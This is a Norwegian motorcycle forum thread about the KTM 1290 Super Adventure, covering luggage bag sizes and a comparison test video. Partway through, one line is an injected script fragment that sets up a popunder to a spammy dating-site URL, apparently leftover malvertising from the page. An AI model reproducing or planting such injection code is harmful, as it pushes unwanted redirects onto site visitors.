LordShaft skrev:Supert, takk for svar. Jeg kikker en som er litt mindre. Tenker den på 11 - 15 liter. Er ikke så mye jeg skal ha oppi der.
Da er det "City" bag'en du skal ha.
Det er nemlig tre stykker som passer bra på SA'en og det er "Trial" på opptil 25 liter, "GS", som jeg har, på inntil 22 liter og til slutt "City" med maks kapasitet på 15 liter.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Når du sier det slik får du det til å høres veldig femi ut
Jeg likte veldig godt den løsningen med veske på hekken også. Men i første omgang skal jeg klare meg i massevis med tankvesken. Men det er ikke umulig at jeg finner på noe slikt selv
LordShaft skrev:Når du sier det slik får du det til å høres veldig femi ut
Jeg likte veldig godt den løsningen med veske på hekken også. Men i første omgang skal jeg klare meg i massevis med tankvesken. Men det er ikke umulig at jeg finner på noe slikt selv
Hekkveska er bare helt genial!
Anbefaler absolutt den også .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Test av BmwXR, KtmSA og Ducati Multistrada i Alpene. Men det var til slutt følgesykkelen Bmw GS som "vant"
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
En litt merkelig testrapport, må jeg si...
Å trekke inn GS'en helt mot slutten etter å ha gitt inntrykk av at det var disse tre, XR1000, KTM 1290 SA og Ducati Multistrada som ble testet, virker unektelig noe underlig...
Betalt testrapport, eller... ?
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
GS'en var den sykkelen alle hadde lyst til å kjøre når de var slitne og trøtte etter en lang dag med testing av de andre tre.
Fikk også inntrykk at det var rimelig fokusert på alpepass og hårnåler.
Kul video forresten, par av de gutta der kjører ganske hardt. De lager artige reviews.
Fin test dette. Virker som om det eneste dem var samstemte om var at Ducati'en ikke var en "vinner". Det sto hele tiden mellom KTM og S1000XR, helt til GS'en dukket opp fra intet
Jeg ser dog argumentet til han ene som mener at XR var den sykkelen som krevde mest erfaring grunnet motoren. Dette var i følge dem en mer "performance" sykkel og jeg kan skrive under på at den motoren har langt mer krefter enn man strengt tatt trenger til aktiv kjøring.
Andreas skrev:Jeg for spørre igjen; kommer SA i noe annen farge en hvit?
Årets modell fås kun i hvit.
Hva som skjer neste år er foreløpig ukjent.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering